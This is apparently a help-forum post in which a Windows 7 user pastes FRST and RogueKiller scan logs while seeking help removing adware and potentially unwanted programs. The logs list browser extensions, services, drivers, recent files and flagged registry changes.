BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO-x32: No Name -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} ->  No File
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll No File
Toolbar: HKLM-x32 - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> No Name - {C66A678D-5E6C-4AF9-8F57-C6192F42CF74} -  No File
DPF: HKLM-x32 {E4D88471-7ED7-43E1-B290-205559E8EBB2} https://my.madisonhospital.org/mig/mae/login/Browser%20Logoff.dll
DPF: HKLM-x32 {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} https://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 10.10.10.254
Tcpip\..\Interfaces\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}: [NameServer] 8.8.8.8

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_257.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_257.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2977827394-2594518940-965070511-1000: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101752.dll (Amazon.com, Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml
FF HKLM-x32\...\Firefox\Extensions: [url_advisor@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com
FF Extension: Модуль перевірки посилань - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [virtual_keyboard@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com
FF Extension: Віртуальна клавіатура - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [content_blocker@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com
FF Extension: Модуль блокування небезпечних веб-сайтів - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [anti_banner@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com
FF Extension: Chặn quảng cáo - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [online_banking@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com
FF Extension: Безпечні платежі - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com [2014-11-24]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR HKLM\...\Chrome\Extension: [blbkdnmdcafmfhinpmnlhhddbepgkeaa] - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa [Not Found]
CHR HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Chrome\Extension: [mgekkbflbjgdcmbphhpaikbmjbifkaib] - C:\Users\Bonnie\AppData\Local\CRE\mgekkbflbjgdcmbphhpaikbmjbifkaib.crx [2014-03-05]
CHR HKLM-x32\...\Chrome\Extension: [blbkdnmdcafmfhinpmnlhhddbepgkeaa] - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [dchlnpcodkpfdpacogkljefecpegganj] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [hakdifolhalapjijoafobooafbilfakh] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [hghkgaeecgjhjkannahfamoehjmkjail] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [jagncdcchgajhfhijbbhecadmaiegcmh] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\virtkbd.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [mgekkbflbjgdcmbphhpaikbmjbifkaib] - C:\Users\Bonnie\AppData\Local\CRE\mgekkbflbjgdcmbphhpaikbmjbifkaib.crx [2014-03-05]
CHR HKLM-x32\...\Chrome\Extension: [pjldcfjmnllhmgjclecdnfampinooman] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx [2013-10-08]
CHR StartMenuInternet: Google Chrome - C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVP; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe [214512 2013-10-08] (Kaspersky Lab ZAO)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [144672 2010-03-09] (Nuance Communications, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [458336 2014-11-25] (Kaspersky Lab ZAO)
S4 klflt; C:\Windows\System32\DRIVERS\klflt.sys [115296 2014-11-25] (Kaspersky Lab ZAO)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [625248 2014-11-25] (Kaspersky Lab ZAO)
R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [29792 2013-10-08] (Kaspersky Lab ZAO)
R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [29280 2014-11-25] (Kaspersky Lab ZAO)
R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2013-10-08] (Kaspersky Lab ZAO)
R1 klpd; C:\Windows\System32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO)
R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [55904 2013-05-14] (Kaspersky Lab ZAO)
R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [178272 2014-11-25] (Kaspersky Lab ZAO)
S1 BHDrvx64; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\BASHDefs\20120711.002\BHDrvx64.sys [X]
S3 NAVENG; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\ENG64.SYS [X]
S3 NAVEX15; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\EX64.SYS [X]
S1 qknfd; system32\drivers\qknfd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-20 23:22 - 2015-01-20 23:23 - 00024194 _____ () C:\Users\Admin\Desktop\FRST.txt
2015-01-20 23:21 - 2015-01-20 23:22 - 00000000 ____D () C:\FRST
2015-01-20 21:51 - 2015-01-20 21:51 - 15431256 _____ () C:\Users\Admin\Desktop\RogueKiller.exe
2015-01-20 21:50 - 2015-01-20 21:50 - 02126848 _____ (Farbar) C:\Users\Admin\Desktop\FRST64.exe
2015-01-19 11:14 - 2015-01-19 11:14 - 00000000 ____D () C:\Windows\ERDNT
2015-01-19 11:13 - 2015-01-19 11:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT
2015-01-19 11:13 - 2015-01-19 11:13 - 00000000 ____D () C:\Program Files (x86)\ERUNT
2015-01-19 11:10 - 2015-01-19 11:10 - 00791393 _____ (Lars Hederer ) C:\Users\Admin\Desktop\erunt-setup.exe
2015-01-17 15:49 - 2015-01-17 15:49 - 00011208 _____ () C:\Users\Admin\Desktop\attach.txt
2015-01-17 15:49 - 2015-01-17 15:48 - 00024278 _____ () C:\Users\Admin\Desktop\dds.txt
2015-01-16 21:21 - 2015-01-16 21:21 - 00000020 ___SH () C:\Users\Admin\ntuser.ini
2015-01-16 21:21 - 2015-01-16 21:21 - 00000000 ____D () C:\Users\Admin
2015-01-16 21:21 - 2012-06-01 02:04 - 00000000 ____D () C:\Users\Admin\AppData\Local\Microsoft Help
2015-01-16 21:21 - 2012-05-29 04:19 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Macromedia
2015-01-16 21:21 - 2009-07-13 21:54 - 00000000 ___RD () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-01-16 21:21 - 2009-07-13 21:49 - 00000000 ___RD () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-01-14 23:55 - 2015-01-20 22:29 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-01-14 23:48 - 2015-01-14 23:49 - 517151106 _____ () C:\Users\Bonnie\Documents\registryBackup_1-14-15.reg
2015-01-14 23:14 - 2015-01-14 23:14 - 00000004 _____ () C:\Users\Bonnie\AppData\Roaming\appdataFr2.bin
2015-01-14 22:38 - 2014-12-18 20:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-14 22:38 - 2014-12-18 18:46 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-14 22:38 - 2014-12-11 22:35 - 05553592 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-14 22:38 - 2014-12-11 22:31 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-01-14 22:38 - 2014-12-11 22:31 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-01-14 22:38 - 2014-12-11 22:31 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-01-14 22:38 - 2014-12-11 22:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-01-14 22:38 - 2014-12-11 22:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-01-14 22:38 - 2014-12-11 22:07 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-01-14 22:38 - 2014-12-11 10:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-14 22:38 - 2014-12-05 21:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-14 22:38 - 2014-12-05 20:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2015-01-14 22:38 - 2014-12-05 20:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll
2015-01-14 22:38 - 2014-08-28 19:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2015-01-14 22:38 - 2014-05-08 02:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2015-01-14 22:37 - 2014-09-04 19:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2015-01-14 22:37 - 2014-09-04 18:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2015-01-13 07:53 - 2013-10-01 19:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2015-01-13 07:53 - 2013-10-01 19:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2015-01-13 07:53 - 2013-10-01 19:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2015-01-13 07:53 - 2013-10-01 18:29 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2015-01-13 07:53 - 2013-10-01 18:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2015-01-13 07:53 - 2013-10-01 16:58 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2015-01-13 07:52 - 2013-10-01 18:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2015-01-13 07:52 - 2013-10-01 18:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2015-01-13 07:52 - 2013-10-01 17:15 - 01057280 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2015-01-13 07:52 - 2013-10-01 17:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
2015-01-13 07:52 - 2013-10-01 17:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2015-01-13 07:52 - 2013-10-01 17:01 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2015-01-13 07:52 - 2013-10-01 16:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2015-01-13 07:52 - 2013-10-01 16:08 - 00855552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2015-01-13 07:52 - 2013-10-01 15:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2015-01-13 07:51 - 2012-08-23 07:13 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2015-01-13 07:51 - 2012-08-23 07:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2015-01-13 07:51 - 2012-08-23 07:08 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbGD.sys
2015-01-13 07:51 - 2012-08-23 04:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2015-01-13 07:51 - 2012-08-23 03:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2015-01-13 07:49 - 2015-01-14 23:24 - 00000139 _____ () C:\Users\Bonnie\Desktop\SECURITY QUESTIONs.txt
2015-01-12 21:15 - 2015-01-12 21:15 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2015-01-07 09:57 - 2015-01-07 09:57 - 00000000 ____D () C:\ProgramData\pnikjcemimhgahpjiapnjbejoigfkjcj
2015-01-06 19:51 - 2015-01-06 19:51 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\67F23A27.sys
2015-01-06 19:50 - 2015-01-06 19:50 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\12D43959.sys
2015-01-05 21:04 - 2015-01-12 15:30 - 00000000 ____D () C:\ProgramData\DiscounntLoCaatOr
2015-01-05 21:03 - 2015-01-12 15:32 - 00000000 ____D () C:\ProgramData\SaoftiCoup
2015-01-04 10:45 - 2015-01-04 10:45 - 00003886 _____ () C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-01-04 10:37 - 2015-01-04 10:38 - 00316504 _____ () C:\Windows\Minidump\010415-35771-01.dmp

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-20 23:18 - 2014-11-24 15:22 - 00000000 ____D () C:\ProgramData\Kaspersky Lab
2015-01-20 23:18 - 2009-07-13 21:51 - 00072668 _____ () C:\Windows\setupact.log
2015-01-20 22:45 - 2011-10-06 17:55 - 02014240 _____ () C:\Windows\WindowsUpdate.log
2015-01-20 21:40 - 2012-12-02 20:12 - 00000000 ___RD () C:\Users\Bonnie\Dropbox
2015-01-20 21:40 - 2012-12-02 20:09 - 00000000 ____D () C:\Users\Bonnie\AppData\Roaming\Dropbox
2015-01-20 21:38 - 2009-07-13 22:13 - 00795858 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-20 14:32 - 2009-07-13 21:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-20 14:32 - 2009-07-13 21:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-19 10:58 - 2013-01-02 16:58 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2015-01-16 21:21 - 2012-06-03 08:21 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\Google
2015-01-16 20:59 - 2014-06-11 15:26 - 00000000 ____D () C:\Users\Bonnie\AppData\Roaming\Spotify
2015-01-15 03:20 - 2014-11-21 14:16 - 00000000 ____D () C:\Program Files (x86)\Uniqoupons
2015-01-15 00:05 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-15 00:02 - 2012-06-13 10:34 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-14 23:56 - 2012-06-13 10:34 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-01-14 23:56 - 2012-06-13 10:34 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-01-14 23:56 - 2011-07-20 22:08 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-01-14 23:21 - 2014-03-16 09:50 - 00000000 ____D () C:\Program Files (x86)\Optimizer Pro
2015-01-14 23:02 - 2012-05-29 06:07 - 00787980 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2015-01-14 22:55 - 2013-07-14 02:01 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-14 22:39 - 2012-12-15 11:51 - 113365784 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-01-14 22:38 - 2014-07-01 10:06 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-14 22:34 - 2014-06-11 15:31 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\Spotify
2015-01-14 22:28 - 2014-10-09 19:57 - 00254464 ___SH () C:\Users\Bonnie\Desktop\Thumbs.db
2015-01-13 08:00 - 2009-07-13 20:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-01-13 07:58 - 2010-11-20 20:47 - 01384266 _____ () C:\Windows\PFRO.log
2015-01-13 07:57 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2015-01-13 07:41 - 2014-01-01 15:06 - 00001945 _____ () C:\Windows\epplauncher.mif
2015-01-13 07:39 - 2014-01-26 20:42 - 00000000 ____D () C:\Users\Bonnie\Desktop\Mom RS
2015-01-13 07:39 - 2012-11-26 10:35 - 00000000 ____D () C:\Users\Bonnie\Desktop\Christmas 12
2015-01-13 07:39 - 2012-11-18 12:57 - 00000000 ____D () C:\Users\Bonnie\Desktop\For Jen
2015-01-13 07:39 - 2012-09-09 10:42 - 00000000 ____D () C:\Users\Bonnie\Desktop\August 2012 Ensign
2015-01-10 22:53 - 2012-06-22 16:18 - 00000000 ____D () C:\Users\Bonnie\AppData\Local\CrashDumps
2015-01-08 09:55 - 2010-11-20 20:27 - 00298120 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2015-01-07 09:57 - 2014-04-07 16:54 - 00000000 ____D () C:\ProgramData\2fcd61ef531c55b0
2015-01-06 19:51 - 2014-07-01 10:06 - 00001109 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-01-06 19:51 - 2014-07-01 10:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-01-06 19:51 - 2014-07-01 10:05 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-01-04 10:37 - 2014-03-18 14:50 - 497851607 _____ () C:\Windows\MEMORY.DMP
2015-01-04 10:37 - 2014-03-18 14:50 - 00000000 ____D () C:\Windows\Minidump
2014-12-28 09:58 - 2009-07-13 22:32 - 00000000 ____D () C:\Windows\system32\FxsTmp

==================== Files in the root of some directories =======
2013-03-14 06:09 - 2014-04-07 19:32 - 0000775 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Files to move or delete:
====================
C:\Users\Bonnie\jobq (1).dat
C:\Users\Bonnie\jobq (2).dat
C:\Users\Bonnie\jobq.dat


Some content of TEMP:
====================
C:\Users\Bonnie\AppData\Local\Temp\autorun.dll
C:\Users\Bonnie\AppData\Local\Temp\COMAP.EXE
C:\Users\Bonnie\AppData\Local\Temp\Couponscom.exe
C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpnzo84j.dll
C:\Users\Bonnie\AppData\Local\Temp\fp_pl_pfs_installer.exe
C:\Users\Bonnie\AppData\Local\Temp\_is6A1B.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-01-09 14:52

==================== End Of Log ============================

I have attached Addition.txt as instructed

RogueKiller V10.2.0.0 [Jan 19 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Admin [Administrator]
Mode : Scan -- Date : 01/20/2015  23:35:44

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 17 ¤¤¤
[PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\qknfd (system32\drivers\qknfd.sys) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\qknfd (system32\drivers\qknfd.sys) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\qknfd (system32\drivers\qknfd.sys) -> Found
[PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Found
[PUM.HomePage] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 10.10.10.254 [(Private Address) (XX)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 10.10.10.254 [(Private Address) (XX)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC} | DhcpNameServer : 10.10.10.254 [(Private Address) (XX)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC} | DhcpNameServer : 10.10.10.254 [(Private Address) (XX)]  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
